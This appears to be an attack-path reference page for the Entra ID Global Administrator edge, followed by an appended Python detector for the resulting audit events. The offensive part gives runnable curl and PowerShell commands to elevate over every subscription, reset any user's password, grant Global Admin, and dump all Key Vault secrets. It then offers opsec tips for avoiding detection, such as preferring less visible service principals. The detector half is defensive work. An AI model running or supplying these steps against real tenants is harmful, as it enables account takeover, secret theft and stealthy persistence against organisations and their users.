AZGlobalAdmin

The source principal holds the Global Administrator role in Entra ID, granting full control over the tenant.

Applies to: User / ServicePrincipal → AZTenant

Linux Abuse

Step 1: Elevate to User Access Administrator over all subscriptions

# Must be done via REST - enables Azure resource management
TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://management.azure.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

curl -s -X POST \
  "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Length: 0"

Step 2: Reset any user's password

GRAPH_TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

curl -s -X PATCH "https://graph.microsoft.com/v1.0/users/<target-user-id>" \
  -H "Authorization: Bearer $GRAPH_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"passwordProfile": {"password": "<new-password>", "forceChangePasswordNextSignIn": false}}'

Assign Global Admin to any user

# Look up the activated Global Administrator directory role; its "id" is the <role-id> used below
# (spaces in the $filter expression must be URL-encoded, otherwise the request is rejected)
curl -s "https://graph.microsoft.com/v1.0/directoryRoles?\$filter=displayName%20eq%20'Global%20Administrator'" \
  -H "Authorization: Bearer $GRAPH_TOKEN"

curl -s -X POST "https://graph.microsoft.com/v1.0/directoryRoles/<role-id>/members/\$ref" \
  -H "Authorization: Bearer $GRAPH_TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Windows Abuse

Elevate to User Access Administrator (PowerZure)

Connect-AzAccount -AccessToken <access-token> -AccountId <username>
Set-AzureElevatedPrivileges

Elevate via Az PowerShell

$uri = "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
Invoke-RestMethod -Method POST -Uri $uri -Headers @{Authorization = "Bearer <access-token>"}

Reset any user's password (Microsoft.Graph PowerShell)

Connect-MgGraph -AccessToken <access-token>
Update-MgUser -UserId <target-user-id> `
  -PasswordProfile @{Password = "<new-password>"; ForceChangePasswordNextSignIn = $false}

Assign Global Admin role to controlled user

$roleId = (Get-MgDirectoryRole -Filter "displayName eq 'Global Administrator'").Id
New-MgDirectoryRoleMember -DirectoryRoleId $roleId -DirectoryObjectId <object-id>

Add controlled SP to group (Microsoft.Graph PowerShell)

New-MgGroupMember -GroupId <target-group-id> -DirectoryObjectId <object-id>

Read all key vault secrets after ARM elevation

Get-AzKeyVault | ForEach-Object {
  Set-AzKeyVaultAccessPolicy -VaultName $_.VaultName -ObjectId <object-id> -PermissionsToSecrets get,list
  Get-AzKeyVaultSecret -VaultName $_.VaultName
}

Opsec

  • ARM elevation ("elevateAccess") is logged and generates an alert in many SOC environments.
  • Password resets log in Entra ID audit with actor, target, and timestamp.
  • Role assignments log as "Add member to role" events.
  • Prefer assigning roles to a service principal (less visible) over an interactive user account.
  • Cloud Shell access from Global Admin context can be weaponized without additional tooling.
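As an added defender-side example (not part of this edge's documentation), the Python below walks a batch of constructed audit records and flags the three artifacts the Opsec notes list: the root-scope elevateAccess operation in the Azure Activity Log, "Add member to role" for Global Administrator, and password resets in the Entra ID audit log. Field names follow the Entra directory-audit and Activity Log schemas; every record value, principal and timestamp is invented for the example.

```python
# Constructed records shaped like Entra directory-audit entries plus one Azure
# Activity Log entry: field names follow the public schemas, values are invented.
SAMPLE_LOG = [
    {"source": "arm", "time": "2024-05-01T10:01:05Z", "caller": "admin@example.com",
     "operationName": "Microsoft.Authorization/elevateAccess/action"},
    {"source": "entra", "time": "2024-05-01T10:02:11Z", "activityDisplayName": "Add member to role",
     "initiatedBy": {"app": {"displayName": "ops-automation"}},
     "targetResources": [{"userPrincipalName": "alice@example.com", "modifiedProperties": [
         {"displayName": "Role.DisplayName", "newValue": '"Global Administrator"'}]}]},
    {"source": "entra", "time": "2024-05-01T10:03:40Z", "activityDisplayName": "Reset user password",
     "initiatedBy": {"user": {"userPrincipalName": "admin@example.com"}},
     "targetResources": [{"userPrincipalName": "bob@example.com", "modifiedProperties": []}]},
    {"source": "entra", "time": "2024-05-01T09:00:00Z", "activityDisplayName": "Update user",
     "initiatedBy": {"user": {"userPrincipalName": "hr@example.com"}},
     "targetResources": [{"userPrincipalName": "carol@example.com", "modifiedProperties": []}]},
]

def actor(event):
    """Principal that performed the action: ARM caller, user UPN, or app display name."""
    if event["source"] == "arm":
        return event.get("caller", "unknown")
    by = event.get("initiatedBy", {})
    return ((by.get("user") or {}).get("userPrincipalName")
            or (by.get("app") or {}).get("displayName") or "unknown")

def role_names(event):
    """Role display names from modifiedProperties; Entra stores newValue JSON-quoted."""
    return [p["newValue"].strip('"') for t in event.get("targetResources", [])
            for p in t.get("modifiedProperties", []) if p.get("displayName") == "Role.DisplayName"]

def classify(event):
    """Map one record to (severity, detail) if it matches a step of this edge, else None."""
    if event.get("operationName") == "Microsoft.Authorization/elevateAccess/action":
        return "high", f"{actor(event)} elevated to User Access Administrator at root scope"
    name = event.get("activityDisplayName")
    target = (event.get("targetResources") or [{}])[0].get("userPrincipalName", "unknown")
    if name == "Add member to role" and "Global Administrator" in role_names(event):
        return "high", f"{actor(event)} added {target} to Global Administrator"
    if name == "Reset user password":
        return "medium", f"{actor(event)} reset the password of {target}"
    return None

def detect(events):
    """Run classify() over a batch and return the findings in time order."""
    hits = [(e["time"], classify(e)) for e in sorted(events, key=lambda e: e["time"])]
    return [{"time": t, "severity": h[0], "detail": h[1]} for t, h in hits if h]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["time"], f["severity"].upper(), f["detail"])
```

The same three conditions translate directly into an Entra audit-log or Activity Log query in a SIEM. Since the Opsec notes point out that service principals are less visible, a finding whose actor is an app (as in the second sample record) deserves the same scrutiny as one from a user.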